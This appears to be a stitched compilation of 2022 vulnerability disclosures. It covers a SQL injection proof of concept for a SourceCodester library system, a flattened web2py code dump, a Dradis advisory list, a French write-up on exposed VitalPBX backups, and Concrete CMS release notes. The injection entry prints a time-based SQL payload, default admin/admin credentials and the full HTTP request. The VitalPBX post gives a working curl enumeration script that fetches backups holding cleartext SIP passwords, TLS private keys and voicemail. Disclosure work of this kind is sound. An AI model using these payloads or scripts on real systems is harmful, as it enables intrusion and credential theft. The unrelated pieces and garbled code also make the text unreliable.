A vulnerability was found in SourceCodester Library Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /librarian/bookdetails.php. The manipulation of the argument id with the input ' AND (SELECT 9198 FROM (SELECT(SLEEP(5)))iqZA)-- PbtB leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.

**Title: Library Management System with QR code Attendance 1.0 SQL Injection****Author: Ashish Kumar (https://www.linkedin.com/in/ashish-kumar-0b65a3184)****Date: 27.06.2022****Vendor: https://www.sourcecodester.com/users/kingbhob02****Software: https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html****Version: 1.0****Reference: https://github.com/CyberThoth/CVE/blob/main/CVE/Library%20Management%20System%20with%20QR%20code%20Attendance/Sql%20Injection/POC.md****Description：****The reason for the SQL injection vulnerability is that the website application does not verify the validity of the data submitted by the user to the server (type, length, business parameter validity, etc.), and does not effectively filter the data input by the user with special characters , so that the user's input is directly brought into the database for execution, which exceeds the expected result of the original design of the SQL statement, resulting in a SQL injection vulnerability.Library Management System with QR code Attendance does not filter the content correctly at the "bookdetails" id parameter, resulting in the generation of SQL injection.****Payload used:**

' AND (SELECT 9198 FROM (SELECT(SLEEP(5)))iqZA)-- PbtB

**POC**

1.  Login into the CMS. Admin Default Access:

Username: admin

Password: admin

2.  http://localhost/LMS/librarian/bookdetails.php?id=191
    
3.  Put sleep(5) payload (' AND (SELECT 9198 FROM (SELECT(SLEEP(5)))iqZA)-- PbtB)
    
4.  http://localhost:80/LMS/librarian/bookdetails.php?id=' AND (SELECT 9198 FROM (SELECT(SLEEP(5)))iqZA)-- PbtB
    
5.  code
    

    GET /LMS/librarian/bookdetails.php?id=%27%20AND%20(SELECT%209198%20FROM%20(SELECT(SLEEP(5)))iqZA)--%20PbtB HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
    Cookie: PHPSESSID=0r78mi76ub6k55p8mkce7f4pco
    Connection: close
    

**line 111 of bookdetails.php invokes a SQL query built with input that comes from an untrusted source. This call could allow an attacker to modify the statement's meaning or to execute arbitrary SQL commands**

CVE-2022-2214: CVE/POC.md at main · CyberThoth/CVE

Open redirect vulnerability in web2py versions prior to 2.22.5 allows a remote attacker to redirect a user to an arbitrary web site and conduct a phishing attack by having a user to access a specially crafted URL.

@@ -0,0 +1,228 @@ from gluon.dal import DAL from gluon.storage import Storage from gluon.utils import web2py\_uuid try: \# web3py from gluon.current import current from gluon.url import URL from gluon.helpers import \* except: \# web2py from gluon import current from gluon.html import \*  
  
  
def FormStyleDefault(table, vars, errors, readonly, deletable):  
form \= FORM(TABLE(),\_method\='POST',\_action\='#',\_enctype\='multipart/form-data') for field in table:  
input\_id \= '%s\_%s' % (field.tablename, field.name) value \= field.formatter(vars.get(field.name)) error \= errors.get(field.name) field\_class \= field.type.split()\[0\].replace(':','-')  
if field.type \== 'blob': \# never display blobs (mistake?) continue elif readonly or field.type\=='id': if not field.readable: continue else: control \= field.represent and field.represent(value) or value or '' elif not field.writable: continue elif field.widget: control \= field.widget(table, value) elif field.type \== 'text': control \= TEXTAREA(value or '', \_id\=input\_id,\_name\=field.name) elif field.type \== 'boolean': control \= INPUT(\_type\='checkbox', \_id\=input\_id, \_name\=field.name, \_value\='ON', \_checked \= value) elif field.type \== 'upload': control \= DIV(INPUT(\_type\='file', \_id\=input\_id, \_name\=field.name)) if value: control.append(A('download', \_href\=URL('default','download',args\=value))) control.append(INPUT(\_type\='checkbox',\_value\='ON', \_name\='\_delete\_'+field.name)) control.append('(check to remove)') elif hasattr(field.requires, 'options'): multiple \= field.type.startswith('list:') value \= value if isinstance(value, list) else \[value\] options \= \[OPTION(v,\_value\=k,\_selected\=(k in value)) for k,v in field.requires.options()\] control \= SELECT(\*options, \_id\=input\_id, \_name\=field.name, \_multiple\=multiple) else: field\_type \= 'password' if field.type \== 'password' else 'text' control \= INPUT(\_type\=field\_type, \_id\=input\_id, \_name\=field.name, \_value\=value, \_class\=field\_class)  
form\[0\].append(TR(TD(LABEL(field.label,\_for\=input\_id)), TD(control,DIV(error,\_class\='error') if error else ''), TD(field.comment or '')))  
td \= TD(INPUT(\_type\='submit',\_value\='Submit')) if deletable: td.append(INPUT(\_type\='checkbox',\_value\='ON',\_name\='\_delete')) td.append('(check to delete)') form\[0\].append(TR(TD(),td,TD())) return form  
\# ################################################################ \# Form object (replaced SQLFORM) \# ################################################################  
class Form(object): """ Usage in web2py controller: def index(): form = Form(db.thing, record=1) if form.accepted: ... elif form.errors: ... else: ... return dict(form=form) Arguments: \- table: a DAL table or a list of fields (equivalent to old SQLFORM.factory) \- record: a DAL record or record id \- readonly: set to True to make a readonly form \- deletable: set to False to disallow deletion of record \- formstyle: a function that renders the form using helpers (FormStyleDefault) \- dbio: set to False to prevent any DB write \- keepvalues: (NOT IMPLEMENTED) \- formname: the optional name of this form \- csrf: set to False to disable CRSF protection """  
def \_\_init\_\_(self, table, record\=None, readonly\=False, deletable\=True, formstyle\=FormStyleDefault, dbio\=True, keepvalues\=False, formname\=False, hidden\=None, csrf\=True):  
if isinstance(table, list): dbio \= False \# mimic a table from a list of fields without calling define\_table formname \= formname or 'none' for field in table: field.tablename \= getattr(field,'tablename',formname)  
if isinstance(record, (int, long, basestring)): record\_id \= int(str(record)) self.record \= table\[record\_id\] else: self.record \= record  
self.table \= table self.readonly \= readonly self.deletable \= deletable and not readonly and self.record self.formstyle \= formstyle self.dbio \= dbio self.keepvalues \= True if keepvalues or self.record else False self.csrf \= csrf self.vars \= Storage() self.errors \= Storage() self.submitted \= False self.deleted \= False self.accepted \= False self.cached\_helper \= False self.formname \= formname or table.\_tablename self.hidden \= hidden self.formkey \= None  
request \= current.request  
if readonly or request.method\=='GET': if self.record: self.vars \= self.record else: post\_vars \= request.post\_vars print post\_vars self.submitted \= True \# check for CSRF if csrf and self.formname in (current.session.\_formkeys or {}): self.formkey \= current.session.\_formkeys\[self.formname\] \# validate fields if not csrf or post\_vars.\_formkey \== self.formkey: if not post\_vars.\_delete: for field in self.table: if field.writable: value \= post\_vars.get(field.name) \# FIX THIS deal with set\_self\_id before validate (value, error) \= field.validate(value) if field.type \== 'upload': delete \= post\_vars.get('\_delete\_'+field.name) if value is not None and hasattr(value,'file'): value \= field.store(value.file, value.filename, field.uploadfolder) elif self.record and not delete: value \= self.record.get(field.name) else: value \= None self.vars\[field.name\] \= value if error: self.errors\[field.name\] \= error if self.record: self.vars.id \= self.record.id if not self.errors: self.accepted \= True if dbio: self.update\_or\_insert() elif dbio: self.deleted \= True self.record.delete\_record() \# store key for future CSRF if csrf: session \= current.session if not session.\_formkeys: session.\_formkeys \= {} if self.formname not in current.session.\_formkeys: session.\_formkeys\[self.formname\] \= web2py\_uuid() self.formkey \= session.\_formkeys\[self.formname\]  
def update\_or\_insert(self): if self.record: self.record.update\_record(\*\*self.vars) else: \# warning, should we really insert if record self.vars.id \= self.table.insert(\*\*self.vars)  
def clear(): self.vars.clear() self.errors.clear() for field in self.table: self.vars\[field.name\] \= field.default  
def helper(self): if not self.cached\_helper: cached\_helper \= self.formstyle(self.table, self.vars, self.errors, self.readonly, self.deletable) if self.csrf: cached\_helper.append(INPUT(\_type\='hidden',\_name\='\_formkey', \_value\=self.formkey)) for key in self.hidden or {}: cached\_helper.append(INPUT(\_type\='hidden',\_name\=key, \_value\=self.hidden\[key\])) self.cached\_helper \= cached\_helper return cached\_helper  
def xml(self): return self.helper().xml()  
def \_\_unicode\_\_(self): return self.xml()  
def \_\_str\_\_(self): return self.xml().encode('utf8')

CVE-2022-33146: improved open redirect prevention · web2py/web2py@d980560

### Impact
An authenticated customer can perform SQL injection

### Patches
Issue is fixed in 2.1.1


**SQL Injection in BlockWishList**

High severity GitHub Reviewed Published Jun 25, 2022 in PrestaShop/blockwishlist • Updated Jun 25, 2022

GHSA-2jx3-5j9v-prpp: SQL Injection in BlockWishList

RG-EG series gateway EG350 EG_RGOS 11.1(6) was discovered to contain a SQL injection vulnerability via the function get_alarmAction at /alarm_pi/alarmService.php.

CVE-2022-33128

IBM Db2 for Linux, UNIX and Windows 9.7, 10.1, 10.5, 11.1, and 11.5 is vulnerable to a denial of service as the server may terminate abnormally when executing specially crafted SQL statements by an authenticated user. IBM X-Force ID: 2219740.

CVE-2022-22389: IBM Db2 denial of service CVE-2022-22389 Vulnerability Report

Dradis Professional Edition before 4.3.0 allows attackers to change an account password via reusing a password reset token.

This page lists all security vulnerabilities fixed in released versions of **Dradis**. Each vulnerability is given a security impact rating by the Dradis core team - please note that this rating may vary from platform to platform. We also list the versions of **Dradis** the flaw is known to affect, and where a flaw has not been verified list the version with a question mark.

Please send comments or corrections for these vulnerabilities to: **security\[ {at} \]dradisframework{ \[dot\] }org**

**Fixed in Dradis 4.3.0****Low: Password reset token can be reused in a 5-minute window**

The password reset token can be reused in a 5-minute window.

Affects: Pro: 4.2.0 and possibly older versions of Dradis.

Credit: Goktug Serez

**Fixed in Dradis 4.2.0****low: Authenticated author broken access control: read access to screenshots**

An author can access screenshots from another project.

Affects: CE: 4.1.0, Pro: 4.1.2 and possibly older versions of Dradis.

**Fixed in Dradis 4.1.2****high: Authenticated (author) path traversal vulnerability**

An author can gain authorized access.

Affects: CE: 4.1.0, Pro: 4.1.1 and possibly older versions of Dradis.

Credit: Kristian Varnai

**Fixed in Dradis 4.1.0****medium: Authenticated (author) broken access control: read access to issue content**

An author can read issue content when they are not authorized to access it.

Affects: CE: 4.0.0, Pro: 4.0.0 and possibly older versions of Dradis.

Credit: Kristian Varnai

**Fixed in Dradis 4.0.0****medium: Authenticated (contributor) information disclosure**

After a contributor had been assigned Gateway access to a project by an admin user they may retain access to the project after the projects team has been changed.

Affects: Pro: 3.12.2 and possibly older versions of Dradis when using the Gateway addon.

**Fixed in Dradis 3.11****medium: Authenticated (admin) persistent cross-site scripting**

Insufficient validation around custom fields resulted in arbitrary JavaScript code execution.

Affects: CE: 3.15, Pro: 3.5.0 and possibly older versions of Dradis.

Credit: Michelle Flanagan

**Fixed in Dradis 3.10.1****medium: Authenticated (author) persistent cross-site scripting**

Insufficient validation around avatars resulted in arbitrary JavaScript code execution.

Affects: CE: 3.15, Pro: 3.5.0 and possibly older versions of Dradis.

**Fixed in Dradis 3.9.1****high: Authenticated (author) information disclosure**

An author who is disabled by admins may continue to use the API.

Affects: Pro: 3.5.1 and possibly older versions of Dradis.

**Fixed in Dradis 3.7.0****medium: Authenticated persistent cross-site scripting**

Insufficient output encoding around Comment textareas input resulted in arbitrary JavaScript code execution.

Affects: CE: 3.16, Pro: 3.6.0 and possibly older versions of Dradis.

Credit: Erik Cabetas

**low: Authenticated (admin) persistent cross-site scripting**

Insufficient output encoding around the Methodology templates resulted in arbitrary JavaScript code execution.

Affects: Pro 3.6.0 and possibly older versions of Dradis.

**Fixed in Dradis 3.6.0****high: Authenticated (author) information disclosure**

An author with an active session who is disabled by admins may continue to operate within the application

Affects: Pro 3.5.1 and possibly older versions of Dradis.

**medium: Authenticated (admin) data modification**

An admin can update another user's comment by sending a custom request.

Affects: Pro 3.5.0 and possibly older versions of Dradis.

Credit: Security Compass

**Fixed in Dradis 3.5.0****high: Authenticated (author) information disclosure**

An author without permission on a project may obtain info from that project using the API.

Affects: Pro 3.4.1 and possibly older versions of Dradis.

Credit: Bastian Faure & Florian Nivette

**medium: Authenticated (author) information disclosure**

Mentioning a user in a comment, which does not have access to the project, could result in disclosure of content from future comments in the same thread.

Affects: Pro 3.4.1 and possibly older versions of Dradis.

**Fixed in Dradis 3.4.1****high: Authenticated (author) path traversal vulnerability**

Uploading a malicious zip file it is possible to place files in undesired locations on the filesystem.

Affects: CE 3.14, Pro 3.4 and possibly older versions of Dradis.

Credit: Props go to Emil Sågfors.

**medium: Authenticated (author) information disclosure**

Information from other projects could be disclosed to other users in the system that happened to be using the application concurrently.

Affects: CE 3.14, Pro 3.4 and possibly older versions of Dradis.

**low: Authenticated (admin) SQL Injection**

A SQL injection vector exploitable by administrator accounts only was identified affecting the Contributors module.

Affects: Pro: 3.4 to 3.2.

**Fixed in Dradis 3.2.0****medium: Authenticated persistent cross-site scripting**

Insufficient output encoding around Evidence title resulted in arbitrary JavaScript code execution.

Affects: CE: 3.11, Pro: 3.1.2 and possibly older versions of Dradis.

Credit: Props go to an anonymous Dradis user.

**medium: Authenticated persistent cross-site scripting**

Inline display of some attachments resulted in arbitrary JavaScript code execution.

Affects: CE: 3.11, Pro: 3.1.2 and possibly older versions of Dradis.

Credit: Props go to an anonymous Dradis user.

**Fixed in Dradis 3.11.1****medium: Authenticated persistent cross-site scripting**

Insufficient output encoding around the Textile textarea input resulted in arbitrary JavaScript code execution.

Affects: CE: 3.11, Pro: 3.1.1 and possibly older versions of Dradis.

Credit: Props go to Ohji Kashiwazaki and Sabina Rzeźwicka.

CVE-2019-5925

**Fixed in Dradis 3.10.0****medium: Authenticated persistent cross-site scripting**

Insufficient output encoding around the Textile textarea input resulted in arbitrary JavaScript code execution.

Affects: CE: 3.9, Pro: 2.9 and possibly older versions of Dradis.

Credit: Props go to Robert Diepeveen

**Fixed in Dradis 3.6.0****medium: Authenticated persistent cross-site scripting**

Insufficient output encoding around the revision history module resulted in arbitrary JavaScript code execution.

Affects: CE: 3.x, Pro: 2.X and possibly older versions of Dradis.

Credit: Props go to Marly Wilson

**Fixed in Dradis 3.1.0.rc2****medium: Authenticated persistent cross-site scripting**

Insufficient output encoding around the node labels resulted in arbitrary JavaScript code execution.

Affects: 3.1.0.rc1 and possibly older versions of Dradis.

Credit: Props go to Mahmoud Reda

**Fixed in Dradis 2.5.2****high: Unauthenticated reflected cross-site scripting**

Insufficient output encoding could result in arbitrary JavaScript code being executed if a specially crafted file was uploaded by an authenticated user.

Affects: 2.5.1, 2.5.0 and possibly older versions of Dradis.

Credit: Props go to Russ McRee for identifying this issue.

CVE not assigned yet

**Fixed in Dradis 2.0.1****high: Missing authentication**

The authentication filter was found to be missing in two components of the server module (notes and configuration).

This was fixed in revision 598

Affects: 2.0.0

CVE-2009-0670 (candidate)

CVE-2022-30028: Security Reports | Dradis Framework

Missing access control in the backup system of Telesoft VitalPBX before 3.2.1 allows attackers to access the PJSIP and SIP extension credentials, cryptographic keys and voicemails files via unspecified vectors.

Alors que nous jouions avec configurions notre VitalPBX tranquillement, nous avons découvert une vulnérabilité relativement facile à mettre en œuvre et donnant accès à des données qu’on ne devrait pas pouvoir lire librement (_i.e._ les mot de passe des extensions, mais pas que). Voici comment elle fonctionne... et pourquoi vous devriez mettre votre version à jours.

Inutile pour une famille, donc indispensable pour une famille geek, nous avons un IPBX à la maison. Parmi les nombreux logiciels sur le marché, nous avons installé un VitalPBX dans une machine virtuelle connectée au reste de notre réseau et qui fait le lien entre nos téléphones IP (des IP-8815) et nos lignes externes analogiques (via une passerelle HX4G connectée aux boxes des FAI).

Au fil de nos aventures dans ce monde merveilleux de la VoIP, nous avons expérimenté plein d’astuces qui nous permettent d’avoir, @home, toutes les fonctionnalités qu’on attend d’un système téléphonique d’entreprise (ou d’hôtel) : groupe de sonnerie, messagerie vocale et test de turing (pour éviter les robots d’appel)...

© Rodrigo SalomonHC @ pixabay

Dernière en date : la sauvegarde (parce que les sauvegardes, c’est important). C’est vrai que vu notre infrastructure, ce serveur est rapide à installer et les rares données qu’il contient peuvent être perdues, on aurait donc pu faire l’impasse. Le truc, c’est qu’en tant qu’experts judiciaire, on ne se voit pas intervenir pour des juges et des entreprises sans savoir de quoi on parle (et aussi parce qu’au fond, configurer des serveurs, on aime ça).

Et c’est justement en cherchant à configurer le système de sauvegarde, ou plutôt à l’automatiser, que nous avons découvert cette vulnérabilité...

Les fichiers de sauvegardes étaient accessibles via l’interface web sans aucune restriction et donnent accès, en clair, aux mots de passe aux clés cryptographiques et aux boites vocales (entre autre). Heureusement, c’est corrigé depuis le 4 mai (version 3.2.1) donc mettez votre système à jours.

**La sauvegarde chez VitalPBX**

La configuration des sauvegardes de VitalPBX se fait via l’interface d’administration web. Une fois connecté, vous devez vous rendre dans « admin / Tools / Backup & Restore ». Le formulaire présenté par défaut permet de créer un nouveau profil de sauvegarde, avec au minimum, un nom.

Créer un profil de sauvegarde

Une fois vos profils de sauvegarde créés, vous pouvez les lister via l’icone de menu () puis y accéder en cliquant sur leur nom. Le nouvel écran reprend le formulaire de configuration et ajoute la liste des sauvegardes déjà effectuée (dans la limite configurée plus haut), vous permet d’en restauter une (bouton  à droite dans la ligne correspondante) et de créer de nouveaux points de sauvegarde (bouton  en bas à gauche de l’écran).

Détail d’un profil de sauvegarde

Si vous voulez faire des sauvegardes automatiquement, il faut d’abord ajouter un profile de tâche automatique (via le menu « PBX / Tools / cron profiles ») car tant qu’il n’y en a pas, le champ _Run automatically_ ne poropose que la valeure disabled).

**Vulnérabilités des fichiers de sauvegardes**

Comme vous l’aviez peut être vu, l’interface web propose aussi un bouton  pour télécharger un point de sauvegarde. En cliquant dessus, vous obtiendrez alors une archive au format tar que vous pourriez sauvegarder de votre côté. Ce n’est pas évident parce qu’il nous cache les détails (il est opaque) mais ce bouton ne fait que rediriger votre navigateur vers l’adresse du fichier qui pourrait ressembler à ce qui suit :

    https://monipbx.monreseau.lan/static/backup/c4ca4238a0b923820dcc509a6f75849b/vitalpbx-1650260415.tar

Ça n’a l’air de rien vu comme ça mais en vérifiant les détails, vous allez voir que ça va poser problème.

**Téléchargement sans contrôle d’accès**

La configuration du serveur web se trouve, comme toujours sur les _Red Hat_, dans /etc/httpd/conf.d/ et plus particulièrement, le fichier vitalpbx.conf. On y trouve la configuration des vhosts (serveurs web virtuels) utilisés par vitalpbx, dont celui de l’interface d’administration web qui nous intéresse et dont voici un extrait :

    <VirtualHost *:443>
            ...
            <Directory "/var/lib/vitalpbx/static">
                    Require all granted
            </Directory>
            Alias /static "/var/lib/vitalpbx/static"
            ...
    </VirtualHost>

Si on le lit du bas en haut, on apprend que le préfixe /static dans l’adresse est en fait un alias qui correspond au répertoire /var/lib/vitalpbx/static. Puis (ou plutôt _avant_) que ce répertoire est en libre accès (Require all granted). Aucun code PHP, aucune ligne de configuration ou fichier .htaccess ne viendra tempérer cette absence de contrôle d’accès.

Si on connait l’adresse d’un fichier, on peut y accéder sans contrainte.

Seule consolation, le serveur ne permet pas de lister les fichiers dans un répertoire ; si vous accédez à https://monipbx.monreseau.lan/static/backup/, le système vous retournera une erreur _403 - Forbidden_ (vous n’avez pas le droit de voir le contenu du répertoire).

**Adresse déterministe**

Il faut donc deviner le reste de l’adresse des fichiers de sauvegarde...

    c4ca4238a0b923820dcc509a6f75849b/vitalpbx-1650260415.tar

*   **c4ca4238a0b923820dcc509a6f75849b**, est facile à trouver, il suffirait de la coller dans n’importe quel moteur de recherche pour découvrir qu’il s’agit du MD5 de la chaîne « 1 » (l’identifiant du profil de sauvegarde). En faisant le test avec de nouveaux profiles on obtiens, à chaque fois, le MD5 de leur identifiant, c81e728d9d4c2f636f067f89cc14862c pour 2, puis eccbc87e4b5ce2fe28308fd9f2a7baf3 pour 3, et ainsi de suite.
    
*   **1650260415** est plus subtile (les moteurs de recherche ne vous aideront pas) mais ce n’est que le timestamp du fichier ; soit le nombre de secondes écoulées depuis le 1^er^ janvier 1970 lorsque le fichier a été écrit sur le disque...
    

Tout ce qu’il faut, c’est trouver un identifiant de profil et un timestamp valide, deux informations dont les valeurs suivent des suites toutes simples.

On peut énumérer les profiles (nombres entiers consécutifs) et les timestamps (à rebours à partir de _maintenant_) jusqu’à trouver un fichier de sauvegarde.

**L’exploitation**

Plutôt que tester ces possibilités à la main, on peut automatiser tout ça. Voici une solution en bash 😉. Pour faire court, on teste tous les timestamps sur les dernières 24 heures, pour les 10 premiers profiles. Et on quitte le script dès que curl a trouvé quelque chose.

    #!/bin/bash
    
    now=$(date +%s)
    past=$(date -d "1 day ago" +%s)
    
    for profile in $(seq 1 10) ; do
        md5=$(echo -n $profile | md5sum | sed -e "s/ .*//")
    
        curl -sk "https://localhost/static/backup/$md5/" -o /dev/null -w "%{http_code}" | grep -q "404" && continue
    
        for timestamp in $(seq $now -1 $past) ; do
            curl -fJOsk "https://monipbx.monreseau.lan/static/backup/$md5/vitalpbx-$timestamp.tar" && exit 1
        done
    done

Si vous êtes pressé, on peut accélérer tout ça avec un peu de parallélisme sur les appels à curl. Pour ça, on va modifier la boucle intérieure et directement passer le résultat de seq à xargs.

        export md5=$(echo -n $profile | md5sum | sed -e "s/ .*//")
        ...
        seq $now -1 $past | xargs -P 10 -I % bash -c \
            'curl -fJOsk "https://localhost/static/backup/$md5/vitalpbx-%.tar" && exit 255' \
            || exit 1

**Impact**

Le fichier de sauvegarde est une archive tar contenant d’autres archives (gz et tar.gz). Et parmi tout ce qui est sauvegardé, quelques éléments sont particulièrement intéressant...

*   **asterisk.sql.gz** contient, entre autre, la configuration de certaines extensions PJSIP et leurs identifiants (logins et mots de passe en clair),
*   **dialplan.tar.gz** contient, entre autre, la configuration des extensions SIP (dans sip__50-1-extensions.conf) et PJSIP (dans pjsip__50-1-extensions.conf), dont les identifiants (logins et mots de passe en clair),
*   **certificates.tar.gz** contient les certificats TLS ainsi que leur clé privée correspondante,
*   **voicemail.tar.gz**, comme son nom l’indique, contient les boites vocales, c’est à dire les messages audio que les correspondants ont laissé.

Donc, si quelqu’un a la main sur votre fichier de sauvegarde, il peut :

*   **Usurper les extensions** auprès du serveur de VoIP, et lire les messages vocaux laissés par les correspondants,
*   **Usurper le serveur** de configuration (_e.g._ avec un proxy HTTPS) et ensuite récupérer les mots de passe des administrateurs.

Et une fois qu'on a le mot de passe de l'administrateur, on peut tout faire.

**Correction**

_Telesoft S.A_ a corrigé cette vulnérabilité dans la version 3.2.1, une fois mis à jours, votre serveur n’est donc plus vulnérable à cette attaque 🎉.

Dans le détail, les fichiers de sauvegardes ne sont plus accessible directement (ils sont déplacés dans /var/lib/vitalpbx/backup, en dehors des répertoires accessibles par apache) et nécessitent donc passer par l’interface utilisateur en PHP qui fait les vérifications d’authentification.

Pour savoir si votre installation a été victime de cette attaque, vous pouvez regarder les journaux du serveur web. Ils se trouvent dans /var/log/httpd, une recherche sur /static/backup vous dira si des accès ont eu lieu. Si vous constatez des accès, et si vous voulez rester prudent, changez vos clés TLS et les mots de passe (extensions et pour être prudent, utilisateurs).

**Historique de publication**

*   **Découverte de la vulnérabilité :** 1er avril 2022,
*   **Communication à l’éditeur :** 1er avril 2022,
*   **Correctif de sécurité :** 4 mai 2022 (version 3.2.1 R1).

CVE-2022-29330: CVE-2022-29330 - Vulnérabilité dans VitalPBX < 3.2.1

IBM Cognos Analytics 11.1.7, 11.2.0, and 11.2.1 could allow a low level user to obtain sensitive information from the details of the 'Cloud Storage' page for which they should not have access. IBM X-Force ID: 202682.

CVE-2021-29768: Security Bulletin: IBM Cognos Analytics has addressed multiple vulnerabilities

XSS in /dashboard/blocks/stacks/view_details/ - old browsers only. When using an older browser with built-in XSS protection disabled, insufficient sanitation where built urls are outputted can be exploited for Concrete 8.5.7 and below as well as Concrete 9.0 through 9.0.2 to allow XSS. This cannot be exploited in modern-day web browsers due to an automatic input escape mechanism. Concrete CMS Security team ranked this vulnerability 3.1with CVSS v3.1 Vector AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N. Sanitation has been added where built urls are output. Credit to Credit to Bogdan Tiron from FORTBRIDGE (https://www.fortbridge.co.uk/ ) for reporting

**New Features**

*   Improved appearance and functionality when editing block, area, layout and container styles inline in the page (thanks deek87)
*   Added the ability for an Express attribute to be marked as unique, provided its attribute type supports it. Unique attributes will be useful for SKUs, enforcing email uniqueness, etc…
*   Much improved version comparison feature that can compare the HTML of two page versions and highlight differences (thanks deek87 and hissy)
*   Feature Link block improvements: Adds option for 'link' styled button using BS5 .btn-link button class, Adds the option to include an icon in the button and to have icon only buttons. Moves some construction of the button to the view file to allow easy comprehension/modification/extension in Block Templates by novice developers (thanks Katalysis)
*   Hero Image block improvements: Adds option for 'link' styled button using BS5 .btn-link button class, Adds the option to include an icon in the button and to have icon only buttons. Moves some construction of the button to the view file to allow easy comprehension/modification/extension in Block Templates by novice developers (thanks Katalysis)
*   Added new Security Policy page in the Dashboard (thanks hissy)
*   Added a “Revert to Draft” command button on published pages in the Composer interface (thanks hissy)
*   Improvements and refinements to Dashboard file details screen in desktop and mobile views.
*   Added the ability to move a file folder in the Dashboard file manager.
*   Added the tree view back to the Groups Dashboard page.
*   Add title field for YouTube and Video block types for better accessibility (thanks Mesuva)

**Behavioral Improvements**

*   Express attributes no longer need to be unique across all Express objects. Instead attribute handles can be reused provided they’re not reused within the same object.
*   New Express forms will be created when Express Form blocks that have been copied are edited in their new locations (thanks Xanweb)
*   File chooser has improved view and functionality; bug fixes; adding width, height and size to list and grid view; adding detail image callout on hover.
*   Task Options in the Dashboard have have been moved into a modal dialog when present, so they’re harder to miss (thanks deek87)
*   Express entity attribute handles now can be reused as long as they’re not reused within the same Express object.
*   You can now click on the entire row of a Dashboard results table (like the page search, file manager, etc…) and go to the detail URL.
*   Better display of inline floating commands for things like containers and block move.
*   We now show the container name when hovering over containers in edit mode.
*   Reinstated CSS and JavaScript asset post-processing cache setting; restructured the Dashboard Cache Settings page for better grouping of functionality and explanation.
*   Improve display of Recaptcha settings page.
*   Appearance improvements to Waiting for Me and the Dashboard desktop.
*   Active classes for pages added to the output of the Top Navigation Bar block (thanks danklassen)
*   Locale home page is now undeleteable when using multilingual sites.
*   Miscellaneous performance improvements for logged-in users (thanks hissy)
*   Added rate limiting to Forgot Password using the built-in IP Allowlist/Denylist functionality
*   Better usage of meta canonical tag in page under certain circumstances (thanks hissy)
*   File folders now cannot be deleted if they have sub-folders or sub-files in them.
*   Display improvements to inline style dropdown (no more too-dark panels with no contrast.)
*   Better automatic display of the “Approve Stack” button when editing block parameters, styles and permissions in the stacks Dashboard page.
*   Don’t allow users to delete site types until they have removed all sites of that type.
*   Improvements when Concrete is installed in a subdirectory instead of the root directory of a website.
*   Added the ability to view a user’s public profile from their Dashboard user details page.
*   Added --session-handler to the console install utility. Set to database if you’d like to override the default file-based sessions.
*   Gotten rid of the behavior where certain dynamic trees cause pages to scroll to them on load (visible on Express Object details edit, adding groups, using the Groups selector in custom Dashboard pages, and more)
*   JavaScript and CSS assets now have the timestamp of when the cache was last cleared appended to them (thanks deek87, haeflimi)
*   Added the link back to the “Data Objects” Express management interface from the header of that Express objects results page.
*   Added URL Path as a column that can be added to the Page Search interface.
*   Fixed: Login page forces gray background on custom themes
*   Fixed: Scheduled page publishing doesn't purge the page cache (thanks hissy)
*   Added more caching to certain objects to improve performance (thanks hissy)
*   Pre-selected File Storage Location For Nested Folder

**Bug Fixes**

*   Much improved PHP 8 compatibility fixes for all core block types (thanks deek87)
*   Fixed user permissions for searching users with non super admin not working in sites upgraded from 8.5 until permissions were reset.
*   Fixed inability to assign groups, users, group sets or group combinations to group permissions when updating from 8.5.
*   Improvements to core libraries to allow for installation on PHP 8.1 w/Composer.
*   PHP 8 compatibility fixes for Calendar (thanks deek87)
*   Fixed: Database Character Set is no longer showing current character set.
*   Fixed: Missing font selection for body font in Atomik customizer when using Default skin.
*   Fixed: Batch Task with empty batch does not finish running
*   Fix Top Navigation Bar block 'include sticky nav' setting not set appropriately when editing the block
*   Fixed inability to drag an individual block out of the stacks panel in a page.
*   Fixed: Document Library advanced search fields do not display
*   Fixed “Express form error dirty entity” error that users might see when creating forms on the front-end.
*   Fixed bug where attribute data validation routines weren’t being run when updating certain objects and certain objects in bulk.
*   Fixed: Express Calendar and Calendar Event Attributes Not Correctly Implemented
*   Fixed: "Added to Page" File search filter doesn't work
*   Fixed: Schedule Guest Access doesn't work (thanks HamedDarragi)
*   Fixed: Page Search in chooser dialog doesn’t work (thanks HamedDarragi)
*   Fixed: The multilingual panel/page relations panel didn’t allow you to create pages in the multilingual trees from the related page - and it used to.
*   Fixed strange appearance in Dashboard sitemap selector when using multisite and multiple locales.
*   Fixed bugs with using custom file attributes with the Document Library block.
*   Fixed theme customizer not working on legacy LESS-based themes when being used with a large number of LESS variables.
*   Fixed inability to see sort icons on attributes in the Dashboard.
*   Fix Auto-Nav showing duplicate tabs in themes based on Bootstrap 3 (thanks lvanstrijland)
*   Fixed: When using more than one user search criteria by group, one to include groups and one to exclude groups, we get the wrong results (thanks mnakalay)
*   Fixed: Accordion block doesn't load required assets when not using BS5 based theme.
*   Fixed Error when try to edit 'express details block' (thanks Ruud-Zuiderlicht)
*   Fixed edit page type basic details error on PHP 8.
*   Tooltips now work properly again in Composer interface (thanks danklassen)
*   Fixed inability to create and update skins for themes that had a large number of parameters under certain conditions.
*   Fixed errors that would occur when creating a site, enabling multilingual, setting a new source locale, and deleting the original default locale.
*   Fixed: User activation workflow, Activate action not working
*   Fixed: 9.0.2 Seo Bulk Updater for multilingual site not showing results when selecting All Levels (thanks danklassen)
*   Fixed: Placing a Sticky "Top Navigation Bar" in Global "Navigation" using Atomik blocks editing of page
*   Fixed: Topics Attribute Search Form is not getting translated on Frontend (thanks 1stthomas)
*   Re-enabled the ability to edit a user’s avatar from their Dashboard details page.
